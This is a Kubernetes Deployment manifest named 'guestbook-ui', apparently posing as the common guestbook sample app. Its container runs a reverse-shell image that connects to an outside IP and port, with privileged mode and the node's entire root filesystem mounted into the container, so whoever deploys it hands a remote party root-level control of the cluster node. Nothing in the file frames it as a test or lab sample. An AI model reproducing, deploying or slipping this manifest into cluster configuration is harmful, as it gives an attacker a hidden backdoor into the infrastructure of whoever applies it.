apiVersion: apps/v1
kind: Deployment
metadata:
  name: guestbook-ui
spec:
  replicas: 1
  revisionHistoryLimit: 3
  selector:
    matchLabels:
      app: guestbook-ui
  template:
    metadata:
      labels:
        app: guestbook-ui
    spec:
      container:
        name: guestbook-ui
        image: breenmachine/revshell
        args:
          - '157.245.95.118:9999'
        resources: {}
        volumeMounts:
          - name: hostroot
            mountPath: /host
        securityContext:
          privileged: true
      volumes:
        - name: hostroot
          hostPath:
            path: /
            type: Directory
